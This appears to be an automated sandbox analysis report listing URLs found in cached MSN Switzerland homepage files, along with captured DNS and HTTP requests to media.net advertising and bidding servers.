Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/altkleider-nur-noch-in-stadtz%c3%bcrcher-sammelstellen/ar-AARos
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/die-provisorische-kantonsschule-auf-dem-irchel-kann-2024-starte
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/erste-best%c3%a4tigte-ansteckung-zwei-weitere-verdachtsf%c3%a4l
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/kanton-best%c3%a4tigt-ersten-omikron-fall-in-z%c3%bcrich/ar-AAR
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/kanton-verteidigt-finanzielle-beteiligung-am-kunstprojekt/ar-AA
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/lage-dramatisch-zugespitzt-%c3%b6v-in-winterthur-wird-teilweise
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/traurig-und-primitiv-rettungswagen-w%c3%a4hrend-einsatz-verspra
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/wird-etwas-enger-im-bus-werden-die-kapazit%c3%a4t-aber-stemmen-
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/z%c3%bcrich-zahlt-f%c3%bcr-gr%c3%bcne-hausw%c3%a4nde/ar-AARnq3Z
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
Source: iab2Data[1].json.6.drString found in binary or memory: https://www.onlineumfragen.com/3index_2010_agb.cfm
Source: iab2Data[1].json.6.drString found in binary or memory: https://www.queryclick.com/privacy-policy
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/ssp-datenschutz
Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c
Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.tippsundtricks.co/gesundheit/stueck-seife-bettwasche/?utm_campaign=DECH-bedsoap&amp;utm_
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.tippsundtricks.co/lifehacks/kochendes-wasser-auto/?utm_campaign=DECH-cardent&amp;utm_sou
Source: de-ch[1].htm.6.drString found in binary or memory: https://www.tippsundtricks.co/lifehacks/schwamm-kuhlschrank/?utm_campaign=DECH-schwamm&amp;utm_sourc
Source: unknownDNS traffic detected: queries for: www.msn.com
Source: global trafficHTTP traffic detected: GET /medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netIf-None-Match: "af9b4812e53e25fc57a13f41f6790ac9"Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netIf-None-Match: "e68781cdaae1574dce2fccfea5cb29e3"Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bping.php?&gdpr=0&prid=8PRVV7640&cid=8CU157172&crid=858412214&vi=1638488555656014322&ugd=4&lf=6&cc=CH&sc=ZH&lper=50&wsip=2886781044&r=1638520979551&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&vgd_l2type=setting&vgd_sbSup=0&vgd_is_amp=0&vgd_asn=60068&vgd_rakh=1638488555181756319&vgd_l1rhst=contextual.media.net&vgd_rpth=%2Fmedianet.php&vgd_pgid=p11306311666t202112030842&vgd_pgids=1&vgd_gdprcs=1&vgd_uspa=0&hvsid=00001638520979548014104136331645&gdpr=0&vgd_end=1 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lg3.media.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=6&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netConnection: Keep-AliveCookie: hbcm_sd=1%7C1638520979780
Source: global trafficHTTP traffic detected: GET /rtbsmpubs.php?&gdpr=0&gdprconsent=1&usp_enf=1&usp_status=0&cid=8HBI57XIG&region=nv&ptrid=8PR68Q253&requestString=670468743*4%7C300x250%7C8CU157172%7C858412214%7C&crid=670468743&sd=1&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&bl=1&rt=5&dn=https://contextual.media.net&https=1&act=headerBid&prvReqId=655139198087331261638520979902&erTr=0&hlt=1&ugd=4&adt=desktop&tr=0.17810036448631755&ndec=1&scrsize=1280x1024&taginfo=%7B%7D&pageinfo=%7B%22vw%22%3A284%2C%22vh%22%3A271%2C%22ph%22%3A271%7D&itype=HB-CM&cc=CH&rc=ZH&ct=ZURICH&bt=1&gcp=1&isRefresh=0&callback=window.hbCMBidxc.rtbsheaderBid3S0 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netConnection: Keep-AliveCookie: hbcm_sd=1%7C1638520979780
Source: global trafficHTTP traffic detected: GET /checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=5&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netConnection: Keep-AliveCookie: hbcm_sd=2%7C1638520979780
Source: global trafficHTTP traffic detected: GET /rtbsmpubs.php?&gdpr=0&gdprconsent=1&usp_enf=1&usp_status=0&cid=8HBI57XIG&region=nv&ptrid=8PR68Q253&requestString=976531914*4%7C300x250%7C8CU157172%7C722878611%7C&crid=976531914&sd=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&bl=1&rt=5&dn=https://contextual.media.net&https=1&act=headerBid&prvReqId=695089110086948631638520986847&erTr=0&hlt=1&ugd=4&adt=desktop&tr=0.519716239585557&ndec=1&scrsize=1280x1024&taginfo=%7B%7D&pageinfo=%7B%22vw%22%3A284%2C%22vh%22%3A271%2C%22ph%22%3A271%7D&itype=HB-CM&cc=CH&rc=ZH&ct=ZURICH&bt=1&gcp=1&isRefresh=0&callback=window.hbCMBidxc.rtbsheaderBid3S0 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netConnection: Keep-AliveCookie: hbcm_sd=2%7C1638520979780
Source: global trafficHTTP traffic detected: GET /803288796/fcmain.js?cb=window._mNDetails.initAd&&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1638488555656014322&ugd=4&rtbs=1&nb=1 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netConnection: Keep-AliveCookie: hbcm_sd=4%7C1638520979780
Source: global trafficHTTP traffic detected: GET /checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=1053&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netConnection: Keep-AliveCookie: hbcm_sd=4%7C1638520979780
Source: global trafficHTTP traffic detected: GET /checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=7479&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netConnection: Keep-AliveCookie: hbcm_sd=4%7C1638520979780
Source: global trafficHTTP traffic detected: GET /log?logid=awlog&pid=8PR68Q253&itype=HB-CM&dn=msn.com&cid=8HBI57XIG&svr=2021111013_170&servname=hbcm_na&gdpr=0&csex=0&suc=0&csstr=&tcf_cmp=&tcf_status=&tcf_prp=&usp_status=0&usp_enf=1&usp_string=&ufca=&usp_ldf=&ugd=4&adt=desktop&vid=00001638520987300014104136333773&vsid=&sd=1&gtd=400&inid=0&gfd=&cc=CH&sc=ZH&ct=ZURICH&abte=CONTROL&adbd=0&amp=0&version=1&sB=false&cors=true&disB=false&ice=&vw=284&vh=271&pht=271&cl=&__rk=0&app=0&rtype=&vendor=&isSafari=0&lbr=0&floc_id=&floc_ver=&id_details=&mnkv=&pabte=&pbcm=0&pvid=4&prvAccId=858412214&prvApiId=8CU157172&exid=31&pcId=&pseat=4-BID_API&mowxReqId=655139198087331261638520979902&crid=670468743&g=0&size=300x250&sec=&chnl=&prspt=headerBid&rfc=0&tref=0&fpuReq=1&plcmtt=0&rtime=46&dtc=nydc&rtbsv2=&mp_seg<>=44412%23%2315390%23%2315718%23%2317218%23%2328447%23%2333721%23%2354934%23%2353492%23%2360148&apid=1&wsip=c10-mowx-prod-1&ltime=7221&abs=0&ae=0&ftr<>=&ssregion=&ssreqid=&sssvnm=&bdp=0.02&cbdp=0.02&dcbdp=0&ckfl=0&cs=&mnet_ckfl=0&cat=&attr=&pvAgNm=&pvAgId=&advId=&advNm=&advUrl=unknown&dfpBd=0.02&nms=1&di=&dt=O&epc=858412214&ogbdp=0.02&s=1&snm=success&dbf=1&bdata=sd2%3Dnull~bb%3D186~vv%3D0~erpm%3D0.03~ogerpm%3D0.03~MFB%3D2jo~smm_bid%3D0.02~bm%3D1~smm_sd%3D2021120121~sid%3D858412214~sd%3D1~uid%3D2IaaJtXbXqos4SCzmA~dc2%3D1~btd%3D14241703836931763290446355943300556902506328540099388593272215750316032~scd%3Dzh~uim%3D464908~url_tkc%3D0~ss%3D1280x1024~uiw%3D100~ce%3D1~xgb_sd%3D2021101600~last%3D0~CI%3D2624~ip%3D1xrX0Z~fbb%3D0~riipua%3D0%2C0~xgb_nt%3D101~nts%3D1~tb%3D-1~et%3D27~ct%3Dzurich~rc%3D6%2C0~basis2%3D196~url_b%3D0.03~basis1%3D196~isRef%3D0~lc%3D0~url_tvi%3D0~smm_wr%3D2.2127~url_l%3D50~xgboost_b%3D0.92~bid%3D0.02~xgb_b%3D0.92~dc%3D8~gcat%3D500884~ogbid%3D0.02%7C%7Ccbdp%3D0.02%7C%7Cbflag%3D0%7C%7Csobp%3D0%7C%7Cddiv%3D%25%25DFP_DIV%25%25%7C%7Cdmm%3D%25%25DMS_STRATEGY%25%25%7C%7Cdtc%3Dnydc%7C%7Cabte%3DCONTROL%7C%7Chsw%3D%25%25HAS_SECOND_WINNER%25%25~ibc%3D1~ddt%3D-1~nsz%3D1~tgs%3D300x250~bsb%3D0~bsp%3D0~tmx%3D200&cmpid=&bId=&pcrid=8CU157172-858412214-48-14&ruct=0&brs=&brr=&iurl=https%3A%2F%2Fiurl-a.akamaihd.net%2Fybntag%3F%26cid%3D8CU157172%26crid%3D858412214%26size%3D300x250%26requrl%3Dhttps%253A%252F%252Fwww.msn.com%252Fde-ch%252F%253Focid%253Diehp&htps=0&ptype=27&pbidflr=0.00&exp=sfl%3Dfalse%7CssBucket%3D0%7Cbfl%3D-100%7Cclt%3D0%7Cfl_rl%3D1%7CssProfile%3D0%7Cdbr%3D1%7Ctkd%3Dnull&bfs=0&seat=BID_API&nbr=0&ba=31&ybnca_gbid=&ybnca_erpm=0.03&ybnca_vbid=&yogbdp=0.02&yErpmFlag=0&smsrc=1&strg=&ybnca_bbid=&prvReqId=76112239762996859_53175729_670468743141&dStat=0&ogbid=0.02&acid=340954286069640181638520979899&act=headerBid&dtfdl=&dspltime=&ttfd=&ttm=0&vtm=0&sttm=0&svtm=0&mnrfc=0&mnrf=0&invw=-1&adj1=0&adj0=0&adj2=0&adj3=0&patkey=&patint<>=&pc=&spSource=0&spIvt=3&spId=&spFst=0&spIsReq=3&spTo=3&top=0&btm=0&lft=0&rght=0&mx_SD=&mx_PC=1&mx_SPRIG=1&mx_UCC=2&mx_lr_seg_cnt=0&mx_GCID=0&mx_IAB2=1&mx_ip_exp_verd=&mx_vsGap=&mx_epbc=8CU157172&mx_bsBucket=0&mx_ssProfile=0&mx_lr=0&mx_g_one_uid_sent=None&mx_uid_sent=0&mx_yhs_enabled
Source: global trafficHTTP traffic detected: GET /log?logid=awlog&pid=8PR68Q253&itype=HB-CM&dn=msn.com&cid=8HBI57XIG&svr=2021111013_170&servname=hbcm_na&gdpr=0&csex=0&suc=0&csstr=&tcf_cmp=&tcf_status=&tcf_prp=&usp_status=0&usp_enf=1&usp_string=&ufca=&usp_ldf=&ugd=4&adt=desktop&vid=00001638520995419014104136339406&vsid=&sd=2&gtd=400&inid=0&gfd=&cc=CH&sc=ZH&ct=ZURICH&abte=CONTROL&adbd=0&amp=0&version=1&sB=false&cors=true&disB=false&ice=&vw=284&vh=271&pht=271&cl=&__rk=0&app=0&rtype=&vendor=&isSafari=0&lbr=0&floc_id=&floc_ver=&id_details=&mnkv=&pabte=&pbcm=0&pvid=4&prvAccId=722878611&prvApiId=8CU157172&exid=31&pcId=&pseat=4-BID_API&mowxReqId=695089110086948631638520986847&crid=976531914&g=0&size=300x250&sec=&chnl=&prspt=headerBid&rfc=0&tref=0&fpuReq=1&plcmtt=0&rtime=48&dtc=nydc&rtbsv2=&mp_seg<>=44412%23%2315390%23%2315718%23%2317218%23%2328447%23%2333721%23%2354934%23%2353492%23%2360148&apid=1&wsip=c10-mowx-web-43&ltime=8567&abs=0&ae=0&ftr<>=&ssregion=&ssreqid=&sssvnm=&bdp=0.02&cbdp=0.02&dcbdp=0&ckfl=0&cs=&mnet_ckfl=0&cat=&attr=&pvAgNm=&pvAgId=&advId=&advNm=&advUrl=unknown&dfpBd=0.02&nms=1&di=&dt=O&epc=722878611&ogbdp=0.02&s=1&snm=success&dbf=1&bdata=sd2%3Dnull~bb%3D186~vv%3D0~erpm%3D0.04~ogerpm%3D0.04~MFB%3D10K~smm_bid%3D0.02~bm%3D0.9~smm_sd%3D2021120121~sid%3D722878611~sd%3D2~uid%3D2IaaKnuVnvziDdNYpZ~dc2%3D1~btd%3D14241703849787268410763125577306022343800731350682634986482226645438464~scd%3Dzh~uim%3D466966~url_tkc%3D0~ss%3D1280x1024~uiw%3D100~ce%3D1~xgb_sd%3D2021101600~last%3D0~CI%3D2624~ip%3D1xrX0Z~fbb%3D0~riipua%3D0%2C0~xgb_nt%3D101~nts%3D1~tb%3D-1~et%3D28~ct%3Dzurich~rc%3D8%2C1~basis2%3D196~url_b%3D0.04~basis1%3D196~isRef%3D0~lc%3D0~url_tvi%3D0~smm_wr%3D2.0898~url_l%3D50~xgboost_b%3D0.92~bid%3D0.02~xgb_b%3D0.92~dc%3D8~gcat%3D500884~ogbid%3D0.02%7C%7Ccbdp%3D0.02%7C%7Cbflag%3D0%7C%7Csobp%3D0%7C%7Cddiv%3D%25%25DFP_DIV%25%25%7C%7Cdmm%3D%25%25DMS_STRATEGY%25%25%7C%7Cdtc%3Dnydc%7C%7Cabte%3DCONTROL%7C%7Chsw%3D%25%25HAS_SECOND_WINNER%25%25~ibc%3D1~ddt%3D-1~nsz%3D1~tgs%3D300x250~bsb%3D0~bsp%3D0~tmx%3D200&cmpid=&bId=&pcrid=8CU157172-722878611-48-8&ruct=0&brs=&brr=&iurl=https%3A%2F%2Fiurl-a.akamaihd.net%2Fybntag%3F%26cid%3D8CU157172%26crid%3D722878611%26size%3D300x250%26requrl%3Dhttps%253A%252F%252Fwww.msn.com%252Fde-ch%252F%253Focid%253Diehp&htps=0&ptype=27&pbidflr=0.00&exp=sfl%3Dfalse%7CssBucket%3D0%7Cbfl%3D-100%7Cclt%3D0%7Cfl_rl%3D1%7CssProfile%3D0%7Cdbr%3D1%7Ctkd%3Dnull&bfs=0&seat=BID_API&nbr=0&ba=0&ybnca_gbid=&ybnca_erpm=0.04&ybnca_vbid=&yogbdp=0.02&yErpmFlag=0&smsrc=1&strg=&ybnca_bbid=&prvReqId=5651415265142258_1006712733_976531914141&dStat=0&ogbid=0.02&acid=154704099775382721638520986219&act=headerBid&dtfdl=&dspltime=&ttfd=&ttm=0&vtm=0&sttm=0&svtm=0&mnrfc=0&mnrf=0&invw=-1&adj1=0&adj0=0&adj2=0&adj3=0&patkey=&patint<>=&pc=&spSource=0&spIvt=3&spId=&spFst=0&spIsReq=3&spTo=3&top=0&btm=0&lft=0&rght=0&mx_SD=&mx_PC=1&mx_SPRIG=1&mx_UCC=2&mx_lr_seg_cnt=0&mx_GCID=0&mx_IAB2=1&mx_ip_exp_verd=&mx_vsGap=&mx_epbc=8CU157172&mx_bsBucket=0&mx_ssProfile=0&mx_lr=0&mx_g_one_uid_sent=None&mx_uid_sent=0&mx_yhs_enable
Source: global trafficHTTP traffic detected: GET /803288796/fcmain.js?cb=window._mNDetails.initAd&&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1638488555296348136&ugd=4&rtbs=1&nb=1 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netConnection: Keep-AliveCookie: hbcm_sd=4%7C1638520979780
Source: global trafficHTTP traffic detected: GET /bqi.php?lf=5&&vgd_l2type=setting&pid=8PO8WH2OT&cme=wKMzE5aEf1C7W8c2Zu-wR6W8-LV6OuNn5M8-l7xIv5OFVIrj5gO7h1h0qwkXsk1YkKHiWm6OwnS8YdF7hxOqVy4gI-Di5bXqA_L7Nj1Gg-bLo1QZupPE9_lkGVq8LafeqNrLclh8bDzLkZpLway17PoLJDHoGdSHRiqjLFunN_rSbZHJFAjGFIv7F87z8XmJ-E7BhMXbxjXouwQLvaGa-ShCB3oRwwh8||NDHRnZ9Gz3KXlI-i9OnZqQ==|5gDUJdTGiJzedmq9hanWYg==|sRBSg3CPSiQ=|YdjFvixrVaHKWoanJxQ7pN1u-FbdnHzrNjhpugAcObH3UBK3ulwAWl7Dk2fLSIhhcacW0wejpmUUSEEp7HvKRQ==|N7fu2vKt8_s=|2Vo1csK06ElQVm9wtd7kmyhUd8oCSycUmnOt-CKThRGW5B7OtbhnTLfgAjgMfKS9GxuAl0hmLh7h59eRacx_zlI1mhj_yGBtc0wpPjW7ZYHmZRI-Qs46jvsASGwtenQv5_6kd41JpbzUVoJx6JhY_2c-CqKREqoxgJ7iifrLoawE2O9aRy41se9ZHO7dRZ1TuzVy17bY00rUzIYODMSLh1Pcyr8slxcI|&gdpr=0&prid=8PRVV7640&cid=8CU157172&crid=858412214&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&vi=1638488555656014322&ugd=4&cc=CH&sc=ZH&bdrid=4&startTime=1638520979055&l2type=setting&vgd_l1rakh=1638488555181756319&l1ch=1&sttm=1638520979548&upk=1638520976.1854&hvsid=00001638520979548014104136331645&verid=9999999&vgd_sc=ZH&infr=1&twna=1&vgd_hbReqId=T1638483495C8S22U926&l1hcsd=l1!N4|8028&vgd_l1rhst=contextual.media.net&vgd_gdprcs=1&vgd_uspa=0&vgd_isiolc=0&clp=%7B%7D&cl=%7B%7D&rtbsd=10&bidData=sd2%3Dnull~bb%3D186~vv%3D0~erpm%3D0.03~ogerpm%3D0.03~MFB%3D2jo~smm_bid%3D0.02~bm%3D1~smm_sd%3D2021120121~sid%3D858412214~sd%3D1~uid%3D2IaaJtXbXqos4SCzmA~dc2%3D1~btd%3D14241703836931763290446355943300556902506328540099388593272215750316032~scd%3Dzh~uim%3D464908~url_tkc%3D0~ss%3D1280x1024~uiw%3D100~ce%3D1~xgb_sd%3D2021101600~last%3D0~CI%3D2624~ip%3D1xrX0Z~fbb%3D0~riipua%3D0%2C0~xgb_nt%3D101~nts%3D1~tb%3D-1~et%3D27~ct%3Dzurich~rc%3D6%2C0~basis2%3D196~url_b%3D0.03~basis1%3D196~isRef%3D0~lc%3D0~url_tvi%3D0~smm_wr%3D2.2127~url_l%3D50~xgboost_b%3D0.92~bid%3D0.02~xgb_b%3D0.92~dc%3D8~gcat%3D500884~ogbid%3D0.02%7C%7Ccbdp%3D0.02%7C%7Cbflag%3D0%7C%7Csobp%3D0%7C%7Cddiv%3D%25%25DFP_DIV%25%25%7C%7Cdmm%3D%25%25DMS_STRATEGY%25%25%7C%7Cdtc%3Dnydc%7C%7Cabte%3DCONTROL%7C%7Chsw%3D%25%25HAS_SECOND_WINNER%25%25~ibc%3D1~ddt%3D-1~nsz%3D1~tgs%3D300x250~bsb%3D0~bsp%3D0~tmx%3D200&matchString=hr%3D0&l2ch=1&l2wsip=170721631&sethcsd=set!A18%7C8013&vgd_pgid=p11306311666t202112030842&vgd_pgids=1 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lg3.media.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /48/nrrV52461.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: contextual.media.netConnection: Keep-AliveCookie: hbcm_sd=4%7C1638520979780
Source: global trafficHTTP traffic detected: GET /bqi.php?lf=5&&vgd_l2type=setting&pid=8PO641UYD&cme=S4_cq7T57eCIr457wnOZONsOijxuA5EygvvxEjyXm71KTilyaTdTHRWOugo0C_JUn4twsFFYarKn93u4d6Wh6HMuQsMK5wWTGu1mrmPGv06hdWu24i6BYU93PtG7z1VQdB4ux8XjUQgg7DwLdqAoOijT7cYB0PZ7NTCBf9W5LFQjtZSGcztLSxTeV8g-zadF_C34PocyUZBlJYj8v-g9knLNYbSXoCou||NDHRnZ9Gz3KXlI-i9OnZqQ==|5gDUJdTGiJzedmq9hanWYg==|sRBSg3CPSiQ=|YdjFvixrVaHKWoanJxQ7pN1u-FbdnHzrNjhpugAcObH3UBK3ulwAWiVtoHi1pupYycuLTp-eXshvuac-oX9kgg==|N7fu2vKt8_s=|f5bf1u7fLjnm37la4OqE47RtCc7tk3v3IH31-me1miPZAj1YnQwQh2PphemVXLK4fAUBKHTKZdPfBF6Z3YxbAN_GIqcUs8MdLqegLZSBCy3hsW5q2MOql5UxuUCHNLvR17Gr4GMn9bf5Jf-OYIJvVpxHv8PIWqmXdxa1VL06H2CKusOFWLZA_QmNop8hTtZlFs_wuMW5dZSm1HenepcN0cikahOsfwZT|&gdpr=0&prid=8PRVV7640&cid=8CU157172&crid=722878611&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&vi=1638488555296348136&ugd=4&cc=CH&sc=ZH&bdrid=4&startTime=1638520985695&l2type=setting&vgd_l1rakh=1638488555141945565&l1ch=1&sttm=1638520986209&upk=1638520983.26641&hvsid=00001638520986209014104136331365&verid=9999999&vgd_sc=ZH&infr=1&twna=1&vgd_hbReqId=T1638485630C8S34U173&l1hcsd=l1!N4|8028&vgd_l1rhst=contextual.media.net&vgd_gdprcs=1&vgd_uspa=0&vgd_isiolc=0&clp=%7B%7D&cl=%7B%7D&rtbsd=10&bidData=sd2%3Dnull~bb%3D186~vv%3D0~erpm%3D0.04~ogerpm%3D0.04~MFB%3D10K~smm_bid%3D0.02~bm%3D0.9~smm_sd%3D2021120121~sid%3D722878611~sd%3D2~uid%3D2IaaKnuVnvziDdNYpZ~dc2%3D1~btd%3D14241703849787268410763125577306022343800731350682634986482226645438464~scd%3Dzh~uim%3D466966~url_tkc%3D0~ss%3D1280x1024~uiw%3D100~ce%3D1~xgb_sd%3D2021101600~last%3D0~CI%3D2624~ip%3D1xrX0Z~fbb%3D0~riipua%3D0%2C0~xgb_nt%3D101~nts%3D1~tb%3D-1~et%3D28~ct%3Dzurich~rc%3D8%2C1~basis2%3D196~url_b%3D0.04~basis1%3D196~isRef%3D0~lc%3D0~url_tvi%3D0~smm_wr%3D2.0898~url_l%3D50~xgboost_b%3D0.92~bid%3D0.02~xgb_b%3D0.92~dc%3D8~gcat%3D500884~ogbid%3D0.02%7C%7Ccbdp%3D0.02%7C%7Cbflag%3D0%7C%7Csobp%3D0%7C%7Cddiv%3D%25%25DFP_DIV%25%25%7C%7Cdmm%3D%25%25DMS_STRATEGY